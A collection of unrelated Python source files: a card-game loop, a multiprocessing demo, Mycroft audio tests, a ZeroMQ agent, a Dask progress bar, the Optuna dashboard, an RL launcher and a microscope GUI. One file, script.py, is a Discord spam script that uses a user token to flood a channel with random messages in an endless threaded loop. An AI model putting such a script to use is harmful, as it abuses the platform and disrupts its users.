p4.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p4.live==True:
who = player_list.index(p4)
elif ser_who == -1:
who = -1
#elif ser_who==4 and p4.live==False:
# who= -1
React=[]
file_line=[]
def react():
global p1,p2,p3,p4
global React, file_line
text_file = open("test.txt", "r")
file_line=text_file.readlines()
React.append(p1.time)
React.append(p2.time)
React.append(p3.time)
React.append(p4.time)
txt_line=file_line
for i in range(4):
for j in range(10):
if file_line[j][0]!='P':
continue
elif React[i]<float(file_line[j][3:8]):
txt_line.insert(j,'P'+str(i+1)+' '+str(React[i])+'\n')
del file_line[10]
break
text_file = open("test.txt", "w")
for i in range(10):
data=txt_line[i]
text_file.write(data)
React=[]
def main():
global card1, card2, card3, card4
global present_surface_card, present_sum, present_total_card
global TAKE, who, ready_state, time1
LED_init()
initCard()
initPlayer()
time1 = time.time()
####################################### START READY ##############################################
write1([P,R,E,S,S],5)
write2([T,O,SP,S,T,A,R,T],5)
ready_state=False
ser_input()
time.sleep(2)
LED.screen = [[0 for x in range(32)] for x in range(16)]
write1([SP,SP,A,L,L],5)
write2([SP,R,E,A,D,Y,ex],5)
time.sleep(2)
#LED.screen = [[0 for x in range(32)] for x in range(16)]
####################################### END READY ##############################################
LED.screen = [[0 for x in range(32)] for x in range(16)] # 게임 시작 전 LED CLEAR!
who = 0 # who: 누구차례인지 나타내는 변수, player_list의 index를 나타냄, 처음엔 index 0부터 시작
while True: # 게임 while문
if(len(player_list) == 1): # 게임 종료 조건: 플레이어가 한명 남을 경우
react()
sys.exit()
if(who != -1): i = who
player_list[i].output()
check_cards() # 5개짜리 있다면, TAKE =1 갱신
# if(특정키 입력):
# update_label_remaining() # 특정키 입력시 남은 카드 수 LED 출력
keyboard_input() # 종친 플레이어의 index 반환
if(who == -1): # 아무도 종을 안친 경우
i = (i+1)%len(player_list) # 다음 사람~
if(i>len(player_list)): # 플레이어 한명이 게임에서 진경우 player_list의 길이가 작아짐 그 경우 고려함
i = i-1
else:
i = who # 누가 종친경우 그 사람의 index를 i로!
if __name__ == '__main__':
main()
|
chatb_process.py
|
__author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '8/4/2020 11:30 AM'
from multiprocessing import Process
lis = []
def foo(i):
lis.append(i)
print("This is Process ", i, " and lis is ", lis, " and lis.address is ", id(lis))
if __name__ == '__main__':
for i in range(5):
p = Process(target=foo, args=(i,))
p.start()
print("The end of list_1:", lis)
|
test_utils.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import unittest.mock as mock
from shutil import rmtree
from threading import Thread
from time import sleep
from os.path import exists
import mycroft.audio
from mycroft.util import create_signal, check_for_signal
from mycroft.util.file_utils import get_temp_path
"""Tests for public audio service utils."""
done_waiting = False
def wait_while_speaking_thread():
global done_waiting
mycroft.audio.wait_while_speaking()
done_waiting = True
class TestInterface(unittest.TestCase):
def setUp(self):
if exists(get_temp_path('mycroft')):
rmtree(get_temp_path('mycroft'))
def test_is_speaking(self):
create_signal('isSpeaking')
self.assertTrue(mycroft.audio.is_speaking())
# Check that the signal hasn't been removed
self.assertTrue(check_for_signal('isSpeaking'))
self.assertFalse(mycroft.audio.is_speaking())
def test_wait_while_speaking(self):
# Check that test terminates
create_signal('isSpeaking')
Thread(target=wait_while_speaking_thread).start()
sleep(2)
self.assertFalse(done_waiting)
check_for_signal('isSpeaking')
sleep(2)
self.assertTrue(done_waiting)
@mock.patch('mycroft.audio.utils.is_speaking')
@mock.patch('mycroft.messagebus.send_func.send')
def test_stop_speaking(self, mock_send, mock_is_speaking):
"""Test that stop speak message is sent."""
mock_is_speaking.return_value = True
mycroft.audio.stop_speaking()
mock_send.assert_called_with('mycroft.audio.speech.stop')
@mock.patch('mycroft.audio.utils.is_speaking')
@mock.patch('mycroft.messagebus.send_func.send')
def test_stop_speaking_when_not(self, mock_send, mock_is_speaking):
"""Check that the stop speaking msg isn't sent when not speaking."""
mock_is_speaking.return_value = False
mycroft.audio.stop_speaking()
mock_send.assert_not_called()
if __name__ == "__main__":
unittest.main()
|
agent.py
|
import logging
import os
import queue
import threading
import time
import traceback
import uuid
from signal import SIGINT, SIGTERM, signal
import zmq
from pyrsistent import pmap
from rx.subject import Subject
from .mixins import (
AuthenticationMixin,
NotificationsMixin,
RouterClientMixin,
WebserverMixin,
)
from .utils import Logger, stdout_logger
log = stdout_logger(__name__, level=logging.DEBUG)
class Agent(RouterClientMixin, NotificationsMixin, AuthenticationMixin, WebserverMixin):
def __init__(self, *args, name=None, **kwargs):
self.name = name or uuid.uuid4().hex
self.log = Logger(log, {"agent": self.name})
self.initialized_event = threading.Event()
self.exit_event = threading.Event()
self.zmq_sockets = {}
self.zmq_poller = zmq.Poller()
self.threads = []
self.disposables = []
# signals for graceful shutdown
signal(SIGTERM, self._shutdown)
signal(SIGINT, self._shutdown)
# boot in thread
t = threading.Thread(target=self.boot, args=args, kwargs=kwargs)
self.threads.append(t)
t.start()
self.initialized_event.wait()
# call initialized hook
self.initialized()
def setup(self):
"""
User override
"""
def initialized(self):
"""
User override
"""
def boot(self, *args, **kwargs):
try:
start = time.time()
self.log.info("Booting up ...")
self.zmq_context = zmq.Context()
# user setup
self.log.info("Running user setup ...")
self.setup(*args, **kwargs)
# setup bases
for base in Agent.__bases__:
if hasattr(base, "setup"):
self.log.info(f"Initiating {base.__name__} setup procedure")
base.setup(self, *args, **kwargs)
# process sockets
t = threading.Thread(target=self.process_sockets)
self.threads.append(t)
t.start()
self.initialized_event.set()
self.log.info(f"Booted in {time.time() - start} seconds ...")
except Exception as e:
self.log.error(f"Failed to boot ...\n\n{traceback.format_exc()}")
self.initialized_event.set()
os.kill(os.getpid(), SIGINT)
def shutdown(self):
"""
Shutdown procedure, call super().shutdown() if overriding
"""
# run shutdown procedures of all bases
for base in Agent.__bases__:
if hasattr(base, "shutdown"):
self.log.info(f"Initiating {base.__name__} shutdown procedure")
base.shutdown(self)
# dispose observables
for d in self.disposables:
self.log.info(f"disposing {d} ...")
d.dispose()
self.log.info("set exit event ...")
self.exit_event.set()
self.log.info("wait for initialization before cleaning up ...")
self.initialized_event.wait()
# join threads
self.log.info("joining threads ...")
for t in self.threads:
self.log.info(f"joining {t}")
t.join()
self.log.info("joining threads complete ...")
# destroy zmq sockets
for k, v in self.zmq_sockets.items():
self.log.info(f"closing socket {k} ...")
v["socket"].close()
self.zmq_context.term()
def _shutdown(self, signum, frame):
self.shutdown()
########################################################################################
## networking
########################################################################################
def bind_socket(self, socket_type, options, address):
self.log.info(f"binding {socket_type} socket on {address} ...")
socket = self.zmq_context.socket(socket_type)
for k, v in options.items():
if type(v) == str:
socket.setsockopt_string(k, v)
else:
socket.setsockopt(k, v)
socket.bind(address)
observable = Subject()
socket_name = f"{socket_type}:{address}"
send_queue = queue.Queue()
self.zmq_sockets[socket_name] = pmap(
{
"socket": socket,
"address": address,
"type": socket_type,
"options": options,
"observable": observable,
"send_queue": send_queue,
"send": lambda x: send_queue.put(x),
}
)
self.zmq_poller.register(socket, zmq.POLLIN)
return self.zmq_sockets[socket_name]
def connect_socket(self, socket_type, options, address):
self.log.info(f"connecting {socket_type} socket to {address} ...")
socket = self.zmq_context.socket(socket_type)
for k, v in options.items():
if type(v) == str:
socket.setsockopt_string(k, v)
else:
socket.setsockopt(k, v)
socket.connect(address)
observable = Subject()
socket_name = f"{socket_type}:{address}"
send_queue = queue.Queue()
self.zmq_sockets[socket_name] = pmap(
{
"socket": socket,
"address": address,
"type": socket_type,
"options": options,
"observable": observable,
"send_queue": send_queue,
"send": lambda x: send_queue.put(x),
}
)
self.zmq_poller.register(socket, zmq.POLLIN)
return self.zmq_sockets[socket_name]
def process_sockets(self):
# wait for initialization
self.initialized_event.wait()
self.log.info(
f"start processing sockets in thread {threading.current_thread()} ..."
)
while not self.exit_event.is_set():
if self.zmq_sockets:
sockets = dict(self.zmq_poller.poll(50))
for k, v in self.zmq_sockets.items():
# receive socket into observable
if v.socket in sockets and sockets[v.socket] == zmq.POLLIN:
v.observable.on_next(v.socket.recv_multipart())
# send queue to socket (zmq is not thread safe)
while not v.send_queue.empty() and not self.exit_event.is_set():
try:
v.socket.send_multipart(v.send_queue.get(block=False))
except queue.Empty:
pass
else:
time.sleep(1)
|
dask_util.py
|
# -*- coding: utf-8 -*-
from collections import defaultdict
from timeit import default_timer
from threading import Event, Thread, Lock
import os
import time
import sys
try:
from dask.callbacks import Callback
from dask.utils import ignoring
except ImportError as e:
opt_import_err = e
Callback = object
else:
opt_import_err = None
from africanus.util.docs import DefaultOut
from africanus.util.requirements import requires_optional
def format_time(t):
"""Format seconds into a human readable form."""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
w, d = divmod(d, 7)
if w:
return "{0:2.0f}w{1:2.0f}d".format(w, d)
elif d:
return "{0:2.0f}d{1:2.0f}h".format(d, h)
elif h:
return "{0:2.0f}h{1:2.0f}m".format(h, m)
elif m:
return "{0:2.0f}m{1:2.0f}s".format(m, s)
else:
return "{0:5.0f}s".format(s)
def key_bin(key):
if type(key) == tuple:
key = key[0]
if type(key) == bytes:
key = key.decode()
try:
return str(key)
except Exception:
return "other"
class TaskData(object):
__slots__ = ("total", "completed", "time_sum")
def __init__(self, completed=0, total=0, time_sum=0.0):
self.completed = completed
self.total = total
self.time_sum = time_sum
def __iadd__(self, other):
self.completed += other.completed
self.total += other.total
self.time_sum += other.time_sum
return self
def __add__(self, other):
return TaskData(self.completed + other.completed,
self.total + other.total,
self.time_sum + other.time_sum)
def __repr__(self):
return "TaskData(%s, %s, %s)" % (self.completed,
self.total,
self.time_sum)
__str__ = __repr__
def update_bar(elapsed, prev_completed, prev_estimated, pb):
total = 0
completed = 0
estimated = 0.0
time_guess = 0.0
# update
with pb._lock:
for k, v in pb.task_data.items():
total += v.total
completed += v.completed
if v.completed > 0:
avg_time = v.time_sum / v.completed
estimated += avg_time * v.total
time_guess += v.time_sum
# If we've completed some new tasks, update our estimate
# otherwise use previous estimate. This prevents jumps
# relative to the elapsed time
if completed != prev_completed:
estimated = estimated * elapsed / time_guess
else:
estimated = prev_estimated
# For the first 10 seconds, tell the user estimates improve over time
# then display the bar
if elapsed < 10.0:
fraction = 0.0
bar = " estimate improves over time"
else:
# Print out the progress bar
fraction = elapsed / estimated if estimated > 0.0 else 0.0
bar = "#" * int(pb._width * fraction)
percent = int(100 * fraction)
msg = "\r[{0:{1}.{1}}] | {2}% Complete (Estimate) | {3} / ~{4}".format(
bar, pb._width, percent,
format_time(elapsed),
"???" if estimated == 0.0 else format_time(estimated))
with ignoring(ValueError):
pb._file.write(msg)
pb._file.flush()
return completed, estimated
def timer_func(pb):
start = default_timer()
while pb.running.is_set():
elapsed = default_timer() - start
prev_completed = 0
prev_estimated = 0.0
if elapsed > pb._minimum:
prev_completed, prev_estimated = update_bar(elapsed,
prev_completed,
prev_estimated,
pb)
time.sleep(pb._dt)
default_out = DefaultOut("sys.stdout")
class EstimatingProgressBar(Callback):
"""
Progress Bar that displays elapsed time as well as an
estimate of total time taken.
When starting a dask computation,
the bar examines the graph and determines
the number of chunks contained by a dask collection.
During computation the number of completed chunks and
their the total time taken to complete them are
tracked. The average derived from these numbers are
used to estimate total compute time, relative to
the current elapsed time.
The bar is not particularly accurate and will
underestimate near the beginning of computation
and seems to slightly overestimate during the
buk of computation. However, it may be more accurate
than the default dask task bar which tracks
number of tasks completed by total tasks.
Parameters
----------
minimum : int, optional
Minimum time threshold in seconds before displaying a progress bar.
Default is 0 (always display)
width : int, optional
Width of the bar, default is 42 characters.
dt : float, optional
Update resolution in seconds, default is 1.0 seconds.
"""
@requires_optional("dask", opt_import_err)
def __init__(self, minimum=0, width=42, dt=1.0, out=default_out):
if out is None:
out = open(os.devnull, "w")
elif out is default_out:
out = sys.stdout
self._minimum = minimum
self._width = width
self._dt = dt
self._file = out
self._lock = Lock()
def _start(self, dsk):
self.task_start = {}
self.task_data = defaultdict(TaskData)
for k, v in dsk.items():
self.task_data[key_bin(k)].total += 1
self.running = Event()
self.running.set()
self.thread = Thread(target=timer_func, args=(self,))
self.daemon = True
self.thread.start()
def _finish(self, dsk, state, errored):
self.running.clear()
self.task_data.clear()
self.task_start.clear()
def _pretask(self, key, dsk, state):
with self._lock:
self.task_start[key] = default_timer()
def _posttask(self, key, result, dsk, state, worker_id):
with self._lock:
td = self.task_data[key_bin(key)]
td.time_sum += default_timer() - self.task_start.pop(key)
td.completed += 1
|
dashboard.py
|
import collections
import threading
import time
import numpy as np
from optuna._imports import try_import
import optuna.logging
import optuna.study
from optuna.study import StudyDirection
import optuna.trial
from optuna import type_checking
if type_checking.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
with try_import() as _imports:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = """
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
"""
_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
if _imports.is_successful():
class _CompleteTrialsWidget(object):
def __init__(self, trials, direction):
# type: (List[optuna.trial.FrozenTrial], StudyDirection) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.trial.TrialState.COMPLETE
]
self.trial_ids = set([trial._trial_id for trial in complete_trials])
self.direction = direction
values = [trial.value for trial in complete_trials]
if direction == StudyDirection.MINIMIZE:
best_values = np.minimum.accumulate(values, axis=0)
else:
best_values = np.maximum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource(
{
"#": list(range(len(complete_trials))),
"value": values,
"best_value": best_values,
}
)
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x="#", y="value", source=self.cds, alpha=0.3, color="navy")
figure.line(x="#", y="best_value", source=self.cds, color="firebrick")
figure.xaxis[0].axis_label = "Number of Trials"
figure.yaxis[0].axis_label = "Objective Value"
return figure
def update(self, new_trials):
# type: (List[optuna.trial.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.trial.TrialState.COMPLETE:
continue
if trial._trial_id in self.trial_ids:
continue
stream_dict["#"].append(len(self.trial_ids))
stream_dict["value"].append(trial.value)
if self.direction == StudyDirection.MINIMIZE:
self.best_value = min(self.best_value, trial.value)
else:
self.best_value = max(self.best_value, trial.value)
stream_dict["best_value"].append(self.best_value)
self.trial_ids.add(trial._trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.trial.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field)
for field in [
"number",
"state",
"value",
"params",
"datetime_start",
"datetime_complete",
]
],
)
def update(
self,
old_trials, # type: List[optuna.trial.FrozenTrial]
new_trials, # type: List[optuna.trial.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials) :]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.trial.FrozenTrial]) -> Dict[str, List[Any]]
return {
"number": [trial.number for trial in trials],
"state": [trial.state.name for trial in trials],
"value": [trial.value for trial in trials],
"params": [str(trial.params) for trial in trials],
"datetime_start": [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None
else None
for trial in trials
],
"datetime_complete": [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None
else None
for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = (
self.study.trials
) # type: Optional[List[optuna.trial.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.trial.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(
self.current_trials, self.study.direction
)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = "Optuna Dashboard (Beta)"
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout(
[
[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()],
],
sizing_mode="scale_width",
)
)
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = self.new_trials is None
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning("Optuna dashboard is still highly experimental. Please use with caution!")
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith(".pyc"):
path = path[:-1]
return path
def _serve(study, bokeh_allow_websocket_origins):
# type: (optuna.study.Study, List[str]) -> None
global _mode, _study
_imports.check()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = "serve"
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ["bokeh", "serve", "--show", _get_this_source_path()]
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(["--allow-websocket-origin", bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def _write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_imports.check()
_show_experimental_warning()
_mode = "html"
_study = study
bokeh.command.bootstrap.main(["bokeh", "html", _get_this_source_path(), "-o", out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == "serve"))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith("bk_script_"):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
script.py
|
import requests
import time
import random
import threading
TOKEN = ""
CHANNEL = 000000000000
DELAY = 3
AMOUNT = 4
def random_chars() -> str:
return "".join(random.choice("abcdefghijklmnopqrstuvwxyz") for i in range(0, random.randint(1, 20)))
def spam_channel(token: str, channel_id=str, content=str, delay=float, amount=int) -> None:
base_url = f"https://canary.discord.com/api/v9/channels/{channel_id}/messages"
headers = {"Authorization": token}
data = {"content": content}
for _ in range(amount):
r = requests.post(base_url, headers=headers, data=data)
if r.status_code != 200:
print(f"Error: {r.status_code} | {r.text}")
time.sleep(delay)
while True:
thread = threading.Thread(target=spam_channel(TOKEN, CHANNEL, random_chars(), DELAY, AMOUNT))
thread.start()
|
sac.py
|
"""Author: Brandon Trabucco, Copyright 2019, MIT License"""
import multiprocessing
from cs285.baselines.off_policy.sac import SAC
from gym.envs.mujoco.half_cheetah import HalfCheetahEnv
def run_experiment(experiment_id):
SAC(
HalfCheetahEnv,
logging_dir="./half_cheetah/sac/{}".format(experiment_id),
hidden_size=256,
num_hidden_layers=2,
num_threads=10,
max_path_length=1000,
max_num_steps=1000000,
reward_scale=1.0,
discount=0.99,
tau=0.005,
policy_delay=1,
initial_alpha=0.01,
qf_learning_rate=0.0003,
policy_learning_rate=0.0003,
batch_size=256,
num_epochs=10000,
num_episodes_per_epoch=1,
num_trains_per_epoch=1000,
num_episodes_before_train=10,
num_epochs_per_eval=10,
num_episodes_per_eval=10).launch()
if __name__ == "__main__":
num_seeds = 5
for seed in range(num_seeds):
multiprocessing.Process(target=run_experiment, args=(seed,)).start()
|
TiltTracker.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import threading
import wx
from leginon.gui.wx.Choice import Choice
from leginon.gui.wx.Entry import Entry, FloatEntry, IntEntry, EVT_ENTRY
from leginon.gui.wx.Presets import EditPresetOrder
from leginon.gui.wx.Presets import PresetChoice
import leginon.gui.wx.Acquisition
import leginon.gui.wx.Dialog
import leginon.gui.wx.Events
import leginon.gui.wx.Icons
import leginon.gui.wx.TargetPanel
import leginon.gui.wx.ToolBar
import leginon.gui.wx.FocusSequence
class Panel(leginon.gui.wx.Acquisition.Panel):
icon = 'focuser'
imagepanelclass = leginon.gui.wx.TargetPanel.TargetImagePanel
def __init__(self, *args, **kwargs):
leginon.gui.wx.Acquisition.Panel.__init__(self, *args, **kwargs)
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ACQUIRE, 'acquire', shortHelpString='Acquire')
# correlation image
self.imagepanel.addTypeTool('Correlation', display=True)
self.imagepanel.addTargetTool('Peak', wx.Colour(255, 128, 0))
self.toolbar.Bind(wx.EVT_TOOL, self.onAcquireTool, id=leginon.gui.wx.ToolBar.ID_ACQUIRE)
self.szmain.Layout()
def onSettingsTool(self, evt):
dialog = SettingsDialog(self,show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onAcquireTool(self, evt):
threading.Thread(target=self.node.testAcquire).start()
class SettingsDialog(leginon.gui.wx.Acquisition.SettingsDialog):
def initialize(self):
return ScrolledSettings(self,self.scrsize,False,self.show_basic)
class ScrolledSettings(leginon.gui.wx.Acquisition.ScrolledSettings):
def initialize(self):
sizers = leginon.gui.wx.Acquisition.ScrolledSettings.initialize(self)
if self.show_basic:
sbsz = self.addBasicTiltSettings()
else:
sbsz = self.addTiltSettings()
return sizers + [sbsz]
def addTiltSettings(self):
sb = wx.StaticBox(self, -1, 'Tilt Options')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
sizer = wx.GridBagSizer(5, 4)
bordersize = 3
label = wx.StaticText(self, -1, 'Activation Interval')
sizer.Add(label, (0, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
self.widgets['activation interval'] = IntEntry(self, -1, chars=5, style=wx.ALIGN_RIGHT)
sizer.Add(self.widgets['activation interval'], (0,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'List of Tilts to Collect (in degrees)')
sizer.Add(label, (1, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
self.widgets['tilts'] = Entry(self, -1, chars=15, style=wx.ALIGN_RIGHT)
sizer.Add(self.widgets['tilts'], (1,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Maximum Tilt Stepsize (in degrees)')
sizer.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['stepsize'] = IntEntry(self, -1, chars=2, value='15')
sizer.Add(self.widgets['stepsize'], (2,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Pause Between Steps')
sizer.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['pause'] = FloatEntry(self, -1, chars=2, value='1')
sizer.Add(self.widgets['pause'], (2,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Min Feature Size')
sizer.Add(label, (3,0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['minsize'] = FloatEntry(self, -1, chars=6, value='0.0')
sizer.Add(self.widgets['minsize'], (3,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Max Feature Size')
sizer.Add(label, (3, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['maxsize'] = FloatEntry(self, -1, chars=6, value='0.0')
sizer.Add(self.widgets['maxsize'], (3,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Median Filter (pixels)')
sizer.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['medfilt'] = IntEntry(self, -1, chars=2, value='0')
sizer.Add(self.widgets['medfilt'], (4,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'LowPass Filter (pixels)')
sizer.Add(label, (4, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['lowfilt'] = FloatEntry(self, -1, chars=2, value='0.0')
sizer.Add(self.widgets['lowfilt'], (4,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Drift threshold')
sizer.Add(label, (5, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['drift threshold'] = FloatEntry(self, -1, chars=6, value='0.0')
sizer.Add(self.widgets['drift threshold'], (5,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Drift preset')
sizer.Add(label, (5, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
presets = self.node.presetsclient.getPresetNames()
self.widgets['drift preset'] = PresetChoice(self, -1)
self.widgets['drift preset'].setChoices(presets)
sizer.Add(self.widgets['drift preset'], (5,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
sbsz.Add(sizer, 0, wx.ALIGN_CENTER|wx.ALL, 2)
return sbsz
def addBasicTiltSettings(self):
sb = wx.StaticBox(self, -1, 'Tilt Options')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
sizer = wx.GridBagSizer(5, 4)
bordersize = 3
label = wx.StaticText(self, -1, 'Activation Interval')
sizer.Add(label, (0, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
self.widgets['activation interval'] = IntEntry(self, -1, chars=5, style=wx.ALIGN_RIGHT)
sizer.Add(self.widgets['activation interval'], (0,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'List of Tilts to Collect (in degrees)')
sizer.Add(label, (1, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
self.widgets['tilts'] = Entry(self, -1, chars=15, style=wx.ALIGN_RIGHT)
sizer.Add(self.widgets['tilts'], (1,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Min Feature Size')
sizer.Add(label, (2,0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['minsize'] = FloatEntry(self, -1, chars=6, value='0.0')
sizer.Add(self.widgets['minsize'], (2,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Max Feature Size')
sizer.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['maxsize'] = FloatEntry(self, -1, chars=6, value='0.0')
sizer.Add(self.widgets['maxsize'], (2,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'Median Filter (pixels)')
sizer.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['medfilt'] = IntEntry(self, -1, chars=2, value='0')
sizer.Add(self.widgets['medfilt'], (3,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
label = wx.StaticText(self, -1, 'LowPass Filter (pixels)')
sizer.Add(label, (3, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['lowfilt'] = FloatEntry(self, -1, chars=2, value='0.0')
